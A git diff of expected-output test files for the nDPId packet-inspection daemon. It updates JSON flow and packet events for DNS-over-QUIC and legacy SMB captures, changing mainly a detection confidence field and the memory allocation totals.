02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1606056093201,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1606056093201,"pkt":"AAAAAAAAAAAAAAAAht1gJPSDBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gTYBOvN\/wAAIAhOL+O5iCYx+Qi72eOch5MP7QBAnCxpB\/ZzHhatBCMXwxT8fSrL9Wdt\/ZFOXhnvUbk6DdAuuzdAXxro6AjNqIcuTb2Re8BepV9SRKgSpP5M7LrQffcZ9shmrS20KZKb\/ztrJeGi\/T\/Srzlr49oBUZ5XMUOjcM7DeI6CgL+ZkO5L8gOV4+8ueGIUub0wiW6+Jof5086V6cR2hj9bBsTK6z5+hag0bw2HYNhsBUUI567S6uj\/AAAgCE4v47mIJjH5CLvZ45yHkw\/tRAEwp7WGjD8jV9zAfZPHhqQ1G3rU1wu59XApa\/uBCBj\/P3rsDGNWqlRQj5q2CQMAtwoaVW5R4D\/leJG\/QScVoSAiDmPCSxR8YrHk5Y7hGxh+CuYKI4vAFyF29Gcm7XH58xSv+Y0je37cyhm71z7xP4G24oT+neWXAiCImQb8UPinjOVju\/1ZXWChdKepJDE+EqJTk8BoOpF9LvyXj5n733Xph2u5IJ\/p\/3foWmTC0fAjiMQ12dhZ6KIFgHDWW0UYsYoYGxC75AmqEL4W0ZygLN4Jp+zSt6jJsE6uSWjtu9Mwx8zRmpzIUbk2rS\/lIYNH+L8sZitAI\/mAouO1FzaXzIPuVV15eTfM\/D4HfHtnBqU5JIgEq30fGDU8vQEvr9VcBwpWT5O0sL5kG6g3W7z970vBsvCXzENm+QLPGXr10ns2jeQncf3V0s9pvLk2K4TGX8jm5gNEpFEQC6sid28q4Y5Bk2mCdnHt7MFfqeIQtVf6U3jEBxXtqNwnbDuTXuCGC9PAu0Ie4j3YiB88cN+EoNanC8QpOjA3mDQP6RbMKMlxgNT1GCSYoSSr70l\/p2Vp0WohDZeycXBsQ9txnWshMbiCp8imTkzhOWSmVNhhzqZOyuIxBEnqW6hAlYSRGGlQym+AFEpgzsjqJLjzqOLeESR5tBel8x5HwEzLLqVaja5Udf5uBnGJUVNub2RGOPiMMnZCl+iL2LRMiCHUoBDmvimDtRLtAOt2SNvH93OMwXA\/IyIrY+XO56T3mS1YSU9Ydwn6d5ywddheaImd1U\/vJ57ZtUSbUvf+DXuTp09bwzrY9tw5NZDPH\/iljKwqemZHmirnsyyz4OUNANR+9\/kuYPx2d\/ZS7953Z8P\/sqzOE3LjEyoUSRCXVL4XoEkGM23PQQcDudByAaZ+9LTgkgxPTKnHgpxcDQowxdEx+BnESQ9DwSJQM7+xTAOPC9sMDrzuSInM7z5AK+Pqrk4B2Vwy+rXo798A5XjeZBrTkCt8XwQLpXhtqaRjTnFTN9kHqTE4fN2bwWBueF8sdBSZ3aK2MK9uuf3XfveW2fg\/1tyeU\/EXgKHtRL55w3iVM91ZMotsrGhoYdGkE7MCdncoh54jfxD5eJPuIFA4F254QXkd2ttFid3O1xFmVbRo9jbjk7d2+6yRzPkKLtyJyptApw6QxkBCFBxcnQA+oUEGOkjoCUtqGfeqRlTptqqqHIGzgHL7YafvSlJW897JYtCkXn4zJMDfapn6QTBVXFY5QqgjOXt2wlG+PDpn\/mQw9NRGoj69MbbDe3NA2MYvJlkgzXKIONO\/pMfrd3koD58ywf54r7NUNGTOOHuRxW0PSRKrZNlpqXdbaK\/wnr76JF4R3R\/+EOYL7g=="} 01111{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1606056093201,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":541,"pkt_l4_len":487,"thread_ts_msec":1606056093201,"pkt":"AAAAAAAAAAAAAAAAht1gJPSDAecRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gHnAfrr\/wAAIAhOL+O5iCYx+Qi72eOch5MP7UD5fEmqw9QcMOSnUe6MDD2OecgnWjkNXdwC4dZSYxJC82j7Fa0gkq+nfYTDU9ChVEdtH45\/vQtNEQLo8\/fwDbneJcHDHavc8EGoV3PxsxkBJhE9Q9u9yCLvfi5OphDBHPeBIHPaxUcLs3S\/L\/IXKVQgfNTTVjkzoLHy1OXpC+\/dTEnbC6NPh6W28rc+x7GLNNHF1FfqMGoKlGMxFCg2HP4dP34NipPXt9vl2rd70ScFdoNK8lXc8OrIbXPCPHixiwns3JeTqs80ZysmuTQ2x3K2Z0oX8Qiv0kbMUxxeHDtUjo8dxO3WaXzqWjfDA1saoqoMHVxUCwkVWx\/nTk4v47mIJjH5cyeRXhMbCk5EqVB08GBVQ7VrDqROkZ4dznjO7Fxcyd8w3IE3VD3OcSvdJI5P\/k+2JVbsoJApIjU\/SqrAeDrs9BCVoOX+elSyfnlFmV+9qRiAxndyJco\/u++psEVtXikdkQ7Ddxgmc8mefhAnBHbf+ng4whbMJA82KtXAE9ITJwKPkOdTXiPwFa2uYw57B9+WqNDFf9ReX9HTME9BVtddLPrQ8G9aG6w3Krk5ZmHecrC9Btpgbpsrq+OkBS2cbpJHIvCTkg=="} 00532{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1606056093260,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"thread_ts_msec":1606056093260,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQRnKgAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBSTi\/juYgmMflcDuw8PGqwk7AnmnlBLKl9VVw5FwNIUr\/uwhxQriWlV5lsPREfqCWcyBCgL5DIrZMPOHK4EaoyceBY8ce9ZV4nlYvSeOP\/TgYtdDng"} -00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00593{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093260,"flow_last_seen":1606056093260,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056093260,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1606056093360,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"thread_ts_msec":1606056093360,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQTEgwAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBBTi\/juYgmMfl+TZ3+Hmg+6BC4SDTuwiFJDfNooVH1WKEmkSpLklzCTh\/kA9o9N4HNfPmXD7MqNM0jiO2jHXBOtk8kidE7CVxn0BTfngjMfjmwfG7Q"} 00641{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1606056093560,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":195,"pkt_l4_len":141,"thread_ts_msec":1606056093560,"pkt":"AAAAAAAAAAAAAAAAht1gAryMAI06QAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAQQoBAAAAABgJPSDAF0RQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gBdAHBcTi\/juYgmMfl+eB8WJkIN5W\/s2kV3mgzDwRAUXXe+90zefQTxG5fKyAbzm2S0iX0HuS+7+NHu2bYpwdweEdBhQ2oYMUDLzzaxqsrt98mI\/P6gjJFj"} -00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1606056093260,"flow_last_seen":1606056096363,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":846,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00790{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1606056093199,"flow_last_seen":1606056096363,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3920,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1606056093260,"flow_last_seen":1606056096363,"flow_idle_time":140000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":846,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00790{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1606056093199,"flow_last_seen":1606056096363,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":3920,"flow_avg_l4_payload_len":280,"midstream":0,"thread_ts_msec":1606056096363,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"doq.pcapng","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":4766,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1606056096363} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -21,9 +21,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5881217 bytes -~~ total memory freed........: 5881217 bytes -~~ total allocations/frees...: 118159/118159 +~~ total memory allocated....: 6014851 bytes +~~ total memory freed........: 6014851 bytes +~~ total allocations/frees...: 120921/120921 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2144 chars diff --git a/test/results/doq_adguard.pcapng.out b/test/results/doq_adguard.pcapng.out index f7a1047be..1b00e7640 100644 --- a/test/results/doq_adguard.pcapng.out +++ b/test/results/doq_adguard.pcapng.out @@ -2,10 +2,10 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1608278425043} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02115{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1608278425043,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"thread_ts_msec":1608278425043,"pkt":"CL6sCxdumt9Y+uvcCABFAATsXYdAAEARno7AqAypXowODqBuAxAE2E0Zwf8AAB0S1uV91ARNGaKcpPbuz4JRKRijEV3+fOp1xbl+o2VPCxw5C7F1AESjjIExuU1VGYMi3qR5FgZXmV5jW\/GS3bvPGESTCXlAOuaNPS4Z9rqb5GmZjOPu5h+dEeHCBQsH0bRQhppRcffIYyvfvxi5LNyq540e1YcNLgxwEYv9mwEEutsUSgLF8qQi1vATlbVLiQwhaXITCRD653klYnm9BoO04fUR8kaaf1qYfex026282Q5EvztDSyWuA6xW\/3D3I27VAQo2GbCoqYf0QIrZOfacQartZRA3xvw5C0Iz0S7jBboiOrSPOxbet7b4p4CBzdW+POAUSVXQZZS3xQkY5PXEeYGco5aUsp3O0lAaLfFFVll\/srPVtdJxYLG5mlTKam3NxBl9gHT9gkoJzUoEmtdaRDaxhP5yiedQs+JgoW4F1fDqHPMPnBtk1UezjBjE\/COENcHIEQq2HIfbQ9Lv+kS5CfcaSKs2mUQTuvs7\/voDRF2y7TFb+uqyMeAqq3doSDMB2jHa\/EojP\/f+RrMNy\/X7kDEEcbw43eMXD1tzHjBj\/ncaLMsfP3IPyZyF35MF8e+053ploy3mGcl5fW5eZxUFM6FDjn\/9\/9yB7HR5pdMyplGzzI1OpdByhfvbVWjVUlFgtm4LcbCFS9YXIuJWVQaT92LVmTrycmBpec\/NHPi6MerrZrFPH1cWAKJm6C\/35hd09a7vURbcj2Nwu+wvQEGek3M9LNpTgKAxfeLa6jR7yY8FRi9Fslx+40aTEwGgLY10PqSAVV873bY1HrjXgee+hInU5OzwDGisUkG1vjenUqCdXtWODZ9xJFrjxkNSBVsfWyX84bL4AH0cHSMH3bXpv8DZGk6dvuB1thnl5dRd79ArhxOkLRjIKU\/spE2xAqe+laOg7FDuovO8+vb44+p0a1tCIq75DbW5Z\/3eQHDpNFbf\/ZruNBwv0I6n5NxcgHEUQaffXIlX36W8Z8AD3YDD85hA4jZxmySge94o03q\/ZMGs+bJTnaK8KlLmSNMXuFjJ7F4SdWbAr+gE3KQqFqqYY9ZfiG2QbB9\/YTG+8SQBafYwX6k2J2OEpMyUilzmDTz3a5eH47iPLgq2nb2F+k0c4RMx6bB8xhJbOXMxEbB5OktMbojYZ5\/D7JZ6FArciEMMkyFIwplniDv\/bjNCRjIZzGWltVCRAQBZZf0ds2kXzLEOIGMUpx2oFRtwDgwesKJgy9be1woTT3HVmrfv8vUkkFOD253UN9bBIfIU4elVEm8DEZ93RQ8PGCnqpWPqKVclryY+VrRX6bBv\/eydiZowniNJyXmSTkGKfOGX30rdpMaFIjV9VAFWlq4kC1zIbyb3K46JC+I+XxrKEmMLqMbO6CesmtgLUC8vVTv7LWODOF1NIRzdEgb8Qn\/9qSY3t6c\/zKgfF8YyVeS6jf5EL3te6RDnB0wZsaBklSDaR66VSY+qB2O5PnaefdIKM\/htIG2nKmWB0tq+\/dxdUHWEvheHhEbmX4TUB3cfXIIesE+zpUW6KXqwY94WHHPEMe6voxs49AJ\/2IZiFohwbn6CjrWd2PilA\/\/N7kVyw58ilFGWokoGNIRgJ61vUDU8rgEdxFK12mR1bebXKhOpf+Sf7ekcBE2R4BLb6ThrQxQ="} -00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.adguard.com","version":"TLSv1.3","alpn":"doq-i00","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} +00825{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1608278425043,"flow_last_seen":1608278425043,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1608278425043,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.adguard.com","version":"TLSv1.3","alpn":"doq-i00","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} 00630{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1608278425079,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1608278425079,"pkt":"mt9Y+uvcCL6sCxduCABFAACoAbMAAD8RP6dejA4OwKgMqQMQoG4AlJ+l8P8AAB0RXf586nXFuX6jZU8LHDkLsXUEXOoexyg1M1\/+GZvbsGeGqJJILJUnaeRPlfaewSkJ0QM1kILJB9RkVGFQIKTOYfD\/amFvF5G2sUWGCAnPMQAxGtra+t44CL4uNVFuP1UAIYDjP5flgPs8Cfp53+s66ugMjRy2XoqR7aApyqmdoc3EHdt+2Cg="} 02114{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1608278425084,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1274,"pkt_l4_len":1240,"thread_ts_msec":1608278425084,"pkt":"CL6sCxdumt9Y+uvcCABFAATsXYtAAEARnorAqAypXowODqBuAxAE2FXxz\/8AAB0EXOoexxFd\/nzqdcW5fqNlTwscOQuxdUBgKDUzX\/4Zm9uwZ4aokkgslSdp5E+V9p7BKQnRAzWQgskH1GRUYVAgpM5h8P9qYW8XkbaxRYYICc8xADEa2tr63jgIvi41UW4\/VQAhgOM\/l+WA+zwJ+nnf6zrq6AyNHLZeRFASnCr8obwp9Ty5sR7kprQnC0Sv2ZcsxYzIMAthEKqYU0zMuGSEznU2JvTrq\/bykaeb5dqdGxdiszDYKDU6Jn7sPAcjUZ2gh8+BYZGe9phFiloXFkZRqkF4syIAEkOpcy2MK\/fkeUIOyP6wlwkzaY3fbmuxHrqRyLu45SBR1VMQFyHi28JYz7QmMQfDMqnuI0IWIuFKHwG0T\/v0jhF19jPBzG3JSCrPoiaSUV9rQI1kZsCKoMrGjumM68QAfolXONsAd2IYudReWz3mQrB3zOSDXc7+iPJJwc0+KS52obxIkJ0I8SZ7CLjp+FpGH++2YepZGSZYPB5rc\/4HU1bQ4ocmPERQ5l+FpQxpj4cq2AJTX05VWg9LfjDFrHE6D6oMOTTfheRhy7X3SqhzfVhy\/w3RXnv00qwNGkVr8QIR+wCM95sfw88fV3+NqmU3vnLU2z+qvvT2HlvRQm9ykjYa60lgB9sFJ5Ng9ge\/cpn16AR4r\/NoOup4fo8EeFB8cFrAVg+3WG3mgWxUdvK6oND07fFN48QrriL1y7XuIB3Fa65jgY5B4zE7vkkBXKUfGormP9hug8dHVr44WkbHCTqfFJuTHKIf9gtfJ9VQps1jhQjM952WGdM\/mFbut40pSDwrgQgdt0stO2C4PvDiwgzZaEybJzcZBHCUgM8reKIoRyLrSsWciN2b3tsFQXXaEeEGdt8Bc\/5zyh11uwNSzGQ\/Fl2k7QrJleMEWlDCFHuNFZdb7JDVOvqjlXAHTTHX0xSx0KU4aqrg\/kZVORXUFVlv\/xu8mW\/pGVbnSUQNAvLvkvHNdnu1ZPxtBzMoqU+96Xp\/DxrznNbYv32YFRLbK8kA8U4FaZhJ3oS+5KFBikdLEV9Hai2hbk8GZjN2iqviHrHccJqNkg3SIuZD5qamhaUaMG9NOa5pQ9jLJU\/ymgo7DdgKxRH8uuDjWk10CemOYV7pIj9XJEg0HHMmlI1Un6aDxtAu5UK1qm1HNb38yVa+sYeN5Ew6KHyqBUxxS4IflHX5qeqIZPOKrYg5MCubhSudLKbjcH5sXIzejKF8iZ0FlTKPdHSExxjW0QFN6bAWoLJuZE\/4kDcgHKTjdquB1S9wjg6Pah9A0AO1p8+A56ZYLVjRHdUF0Eo6bHTdn4hIgHvxPjCmO5BtWUKEeQnKGkkR8kgREjXo6GfEeHC4Vb4SCK88RJFW07bR+3U68E0sOKimZElroA+KMcE32OqnpsNULoyV7BunASAegp78gVNI0Bil4Klffm6tM6xnJr7Wx08jSGi+pGYWmiGnj3zfHIxpQuw4bIpm3S\/lud8tMnqwiD6\/bIUKO1SxVSWZBp6s2PlGyGHrgwwdIy5nXoip9OukmbhVHpu5a+3BERo9ToRhkKbGsS5gAuyL08\/F6VvMQD\/JdB+\/2rkXCT7ca7Lr49P5aV+w66D8Iwyn8BcCGyOLiGucN4S\/JjMhOeFgH9mu48hQ78o="} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":296,"flow_first_seen":1608278425043,"flow_last_seen":1608278463119,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":32013,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1608278463119,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":296,"flow_first_seen":1608278425043,"flow_last_seen":1608278463119,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":32013,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1608278463119,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"94.140.14.14","src_port":41070,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":296,"source":"doq_adguard.pcapng","alias":"nDPId-test","packets-captured":296,"packets-processed":296,"total-skipped-flows":0,"total-l4-payload-len":32013,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1608278463119} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 296/296 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5888097 bytes -~~ total memory freed........: 5888097 bytes -~~ total allocations/frees...: 118431/118431 +~~ total memory allocated....: 6021731 bytes +~~ total memory freed........: 6021731 bytes +~~ total allocations/frees...: 121193/121193 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 2120 chars diff --git a/test/results/dos_win98_smb_netbeui.pcap.out b/test/results/dos_win98_smb_netbeui.pcap.out index f26613ebc..92818f2da 100644 --- a/test/results/dos_win98_smb_netbeui.pcap.out +++ b/test/results/dos_win98_smb_netbeui.pcap.out @@ -18,12 +18,12 @@ 00354{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":61,"pkt_type":47,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":61,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"AwAAAAABAFBWM3ieAC\/w8AMsAP\/vAQAAAAAACgAAAAAAAAAAAAAAAAAAAAAATURKUjk4ICAgICAgICAgIA=="} 